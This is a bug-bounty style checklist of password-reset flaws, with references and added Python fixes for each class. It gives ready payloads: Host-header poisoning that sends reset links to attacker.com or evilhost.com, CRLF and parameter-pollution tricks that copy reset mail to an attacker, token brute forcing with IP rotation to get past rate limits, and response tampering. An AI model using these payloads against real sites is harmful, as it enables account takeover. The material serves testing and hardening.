Common security flaws in password reset functionality, compiled from Twitter, write-ups and disclosed reports.
[1] Password Reset Token Leak Via Referrer
The HTTP Referer is an optional request header that identifies the address of the web page from which the currently requested resource was linked, i.e. the page the user was on when they followed the link.
Exploitation
- Request a password reset to your own email address
- Click the password reset link
- Don't change the password
- Click a link to any third-party website (e.g. Facebook, Twitter)
- Intercept the request in the Burp Suite proxy
- Check whether the Referer header is leaking the password reset token.
Impact
It allows the person who controls that third-party site to change the user's password (CSRF attack), because this person now knows the user's reset password token.
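The usual fix for this leak is to take the token out of the URL before the user can navigate anywhere else: the emailed link is consumed once, exchanged for a short-lived cookie, and the browser is redirected to a token-free URL served with Referrer-Policy: no-referrer. The handlers below are an added example (not code from the original page); the token value is the placeholder from the page and the cookie lifetime is an assumed policy.

```python
# Added example: consume the reset token from the emailed link immediately and
# continue on a token-free URL, so a later click to a third-party site cannot
# leak the token through the Referer header.
import secrets

# Constructed stores: unused reset tokens, and short-lived reset sessions.
VALID_TOKENS = {"12345678-1234-1234-1234-12345678901"}   # placeholder token from the page
_RESET_SESSIONS = {}                                      # session id -> consumed token

SECURITY_HEADERS = {
    "Referrer-Policy": "no-referrer",   # browser sends no Referer at all from these pages
    "Cache-Control": "no-store",
}

def handle_reset_link(token: str):
    """GET /reset-password.php?token=...  Returns (status, headers, body)."""
    if token not in VALID_TOKENS:
        return 400, dict(SECURITY_HEADERS), "invalid or expired link"
    VALID_TOKENS.discard(token)                           # the emailed link is one-shot
    session_id = secrets.token_urlsafe(32)
    _RESET_SESSIONS[session_id] = token
    headers = dict(SECURITY_HEADERS)
    headers["Set-Cookie"] = (
        f"reset_session={session_id}; HttpOnly; Secure; SameSite=Strict; "
        "Max-Age=600; Path=/reset-password"               # assumed 10-minute window
    )
    headers["Location"] = "/reset-password"               # no token left in the URL
    return 303, headers, ""

def handle_reset_form(cookies: dict):
    """GET /reset-password: the page that actually shows the new-password form."""
    if cookies.get("reset_session") not in _RESET_SESSIONS:
        return 403, dict(SECURITY_HEADERS), "start the reset again"
    return 200, dict(SECURITY_HEADERS), "<form>...</form>"
```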
Reference:
- https://hackerone.com/reports/342693
- https://hackerone.com/reports/272379
- https://hackerone.com/reports/737042
- https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
- https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
[2] Account Takeover Through Password Reset Poisoning
If you find a host header attack and it’s out of scope, try to find the password reset button!
Exploitation
- Intercept the password reset request in Burp Suite
- Add the following headers, or edit the existing ones, in Burp Suite (try them one by one)
You can use an ngrok server as your attacker server
Host: attacker.com
or
Host: target.com
X-Forwarded-Host: attacker.com
or
Host: target.com
Host: attacker.com
- Forward the request
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: evilhost.com
- If you find a password reset token like this
https://evilhost.com/reset-password.php?token=12345678-1234-1234-1234-12345678901
Patch
Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']. The vulnerable code generates the password reset link like this:
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
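The vulnerable pattern above beside the hardened one, as an added example in Python (not the page's PHP, and not any project's code). One caveat on the suggested patch: on Apache with UseCanonicalName Off, which is the default, SERVER_NAME is itself derived from the client-supplied Host header, so the robust fix is a canonical origin taken from configuration, plus rejecting requests for hosts you do not serve. The origin, allowed host list and header dict are assumptions.

```python
from urllib.parse import urlencode

# Assumptions (not from the page): the canonical origin and the hosts we serve
# are fixed in configuration, never read from the request.
CANONICAL_ORIGIN = "https://example.com"
ALLOWED_HOSTS = {"example.com"}

def reset_url_from_headers(headers: dict, token: str) -> str:
    """Vulnerable pattern, the equivalent of "https://{$_SERVER['HTTP_HOST']}/...":
    the origin is whatever Host (or X-Forwarded-Host, behind a proxy) the client sent."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset-password.php?" + urlencode({"token": token})

def reset_url_canonical(token: str) -> str:
    """Hardened pattern: only the token is dynamic; the origin comes from configuration."""
    return f"{CANONICAL_ORIGIN}/reset-password.php?" + urlencode({"token": token})

def host_is_allowed(headers: dict) -> bool:
    """Belt and braces: reject (HTTP 400) any request naming a host that is not ours."""
    for name in ("Host", "X-Forwarded-Host"):
        value = headers.get(name)
        if value is not None and value.split(":")[0].lower() not in ALLOWED_HOSTS:
            return False
    return True

# Constructed headers as a poisoning attempt would send them. A dict cannot carry
# the duplicate-Host variant; a real parser must reject duplicate Host headers too.
POISONED = {"Host": "example.com", "X-Forwarded-Host": "evilhost.com"}
TOKEN = "12345678-1234-1234-1234-12345678901"   # placeholder token from the page

if __name__ == "__main__":
    print(reset_url_from_headers(POISONED, TOKEN))   # link points at evilhost.com
    print(reset_url_canonical(TOKEN))                # link points at example.com
```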
Impact
The victim will receive the malicious link in their email, and, when clicked, will leak the user’s password reset link / token to the attacker, leading to full account takeover.
Reference:
- https://hackerone.com/reports/226659
- https://hackerone.com/reports/167631
- https://www.acunetix.com/blog/articles/password-reset-poisoning/
- https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
- https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
[3] Account Takeover: Password Reset by Manipulating the Email Parameter
Exploitation
- Add the attacker's email as a second parameter using &
POST /resetPassword
[...]
email=victim@example.com&email=attacker@example.com
- Add the attacker's email as a second parameter using %20
POST /resetPassword
[...]
email=victim@example.com%20email=attacker@example.com
- Add the attacker's email as a second parameter using |
POST /resetPassword
[...]
email=victim@example.com|email=attacker@example.com
- Add the attacker's email as a second parameter using cc
POST /resetPassword
[...]
email="victim@example.com%0a%0dcc:attacker@example.com"
- Add the attacker's email as a second parameter using bcc
POST /resetPassword
[...]
email="victim@example.com%0a%0dbcc:attacker@example.com"
- Add the attacker's email as a second parameter using ,
POST /resetPassword
[...]
email="victim@example.com",email="attacker@example.com"
- Add the attacker's email as a second parameter in a JSON array
POST /resetPassword
[...]
{"email":["victim@example.com","attacker@example.com"]}
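All of these variants rely on the server accepting more than one address, or a string with embedded separators, and then mailing whatever it was given. The parser below, an added example that is not part of the original page, accepts exactly one strictly formed address and then sends only to the address stored for that account; the account store, content types and the strict pattern are assumptions.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed account store: normalised address -> address on record.
ACCOUNTS = {"victim@example.com": "victim@example.com"}

# Deliberately strict: one local part, one "@", one domain; no whitespace, quotes,
# separators or control characters. RFC 5322 permits more; a reset flow does not need it.
STRICT_EMAIL = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def _reject_duplicate_keys(pairs):
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):              # {"email":"a","email":"b"}
        raise ValueError("duplicate JSON keys")
    return dict(pairs)

def extract_email(body: str, content_type: str) -> str:
    """Return the single submitted address, or raise ValueError."""
    if content_type == "application/json":
        data = json.loads(body, object_pairs_hook=_reject_duplicate_keys)
        value = data.get("email") if isinstance(data, dict) else None
        if not isinstance(value, str):           # {"email":["a","b"]}
            raise ValueError("email must be a single string")
        return value
    fields = parse_qs(body, strict_parsing=True, keep_blank_values=True)
    values = fields.get("email", [])
    if len(values) != 1:                         # email=a&email=b
        raise ValueError("exactly one email parameter required")
    return values[0]

def reset_recipient(body: str, content_type: str):
    """Address to mail the reset link to, or None.

    The caller should answer identically for None and for success, so the
    response does not reveal whether an account exists."""
    try:
        submitted = extract_email(body, content_type)
    except ValueError:                           # includes malformed JSON / form data
        return None
    if not STRICT_EMAIL.fullmatch(submitted):    # %20, |, %0a%0dcc:, "a",email="b"
        return None
    # Mail the address on record, never the raw submitted string.
    return ACCOUNTS.get(submitted.lower())
```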
Reference
- https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
- https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
- https://twitter.com/HusseiN98D/status/1254888748216655872
[4] Full Account Takeover via Changing Email And Password of any User through API Parameters
Exploitation
- The attacker logs in with their own account and goes to the change-password function
- Start Burp Suite and intercept the request
- Send the intercepted request to Repeater and modify the Email and Password parameters
POST /api/changepass
[...]
{"form": {"email":"victim@example.com","password":"12345678"}}
[5] No Rate Limiting: Email Bombing
Exploitation
- Start the Burp Suite and Intercept the password reset request
- Send it to Intruder
- Use the Null payloads payload type
[6] Find Out How the Password Reset Token is Generated
Figure out the pattern of the password reset token, i.e. whether it is:
- Generated based on a timestamp
- Generated based on the user ID
- Generated based on the user's email
- Generated based on first name and last name
- Generated based on date of birth
- Generated using cryptography
Use Burp Sequencer to find the randomness or predictability of tokens.
[7] Response manipulation: Replace Bad Response With Good One
Look for request/response pairs like these
HTTP/1.1 401 Unauthorized
{"message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful"}
Change the response to
HTTP/1.1 200 OK
{"message":"success","statusCode":200,"errorDescription":"Success"}
[8] Using Expired Token
- Check if the expired token can be reused
[9] Brute Force Password Reset Token
Try to brute-force the reset token using Burp Suite
POST /resetPassword
[...]
email=victim@example.com&code=$BRUTE$
- Use IP Rotator in Burp Suite to bypass IP-based rate limiting.
[10] Try Using Your Token
- Try using your own password reset token with the victim's account
POST /resetPassword
[...]
email=victim@example.com&code=$YOUR_TOKEN$
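Sections [6], [8], [9] and [10] are all properties of one thing: how the token is issued and redeemed. The added example below (not code from the original page) shows a token lifecycle that closes all four: the value comes from the OS CSPRNG rather than any user data or timestamp, only its hash is stored, it expires, it works once, it is bound to the account it was issued for, and repeated wrong codes revoke it. The TTL and failure limit are assumed policies.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60   # seconds of validity; an assumed policy, not from the page
MAX_FAILURES = 5      # wrong codes tolerated per account before its token is revoked

_PENDING = {}         # constructed store: sha256(token) -> [email, expires_at, used]
_FAILURES = {}        # email -> consecutive wrong-code count

def _digest(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()

def issue_reset_token(email: str, now: float = None) -> str:
    """Create the token that goes into the emailed link; only its hash is stored."""
    now = time.time() if now is None else now
    # 32 bytes from the OS CSPRNG: not derived from time, user ID, name or email,
    # so there is no pattern for Burp Sequencer to find and nothing to brute-force.
    token = secrets.token_urlsafe(32)
    _PENDING[_digest(token)] = [email.lower(), now + TOKEN_TTL, False]
    return token

def _record_failure(email: str) -> bool:
    _FAILURES[email] = _FAILURES.get(email, 0) + 1
    if _FAILURES[email] >= MAX_FAILURES:     # revoke: the user must request a new link
        for d, rec in list(_PENDING.items()):
            if rec[0] == email:
                del _PENDING[d]
    return False

def redeem_reset_token(email: str, token: str, now: float = None) -> bool:
    """True exactly once, for the right account, before expiry."""
    now = time.time() if now is None else now
    email = email.lower()
    rec = _PENDING.get(_digest(token))
    if rec is None or not hmac.compare_digest(rec[0], email):
        return _record_failure(email)        # unknown code, or someone else's token
    stored_email, expires_at, used = rec
    if used or now > expires_at:
        return False                         # expired or already consumed
    rec[2] = True                            # single use
    _FAILURES.pop(email, None)
    return True
```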
Bonus
- Completely remove the token
- Change it to 00000000…
- Use a null/nil value
- Try an array of old tokens
- Look for race conditions
- Change one character at the beginning/end to see whether the token is actually validated
- Try registering the same email with a different TLD (.eu, .net, etc.)
- Omit the domain (user@ only)
- Try SQLi bypasses and wildcards (or, %, *)
- Change the request method (GET, PUT, POST, etc.) and/or content type (XML <> JSON)
- Use a very long string
- Use array brackets, e.g. reset.php?id[]=11cb193b98bv3421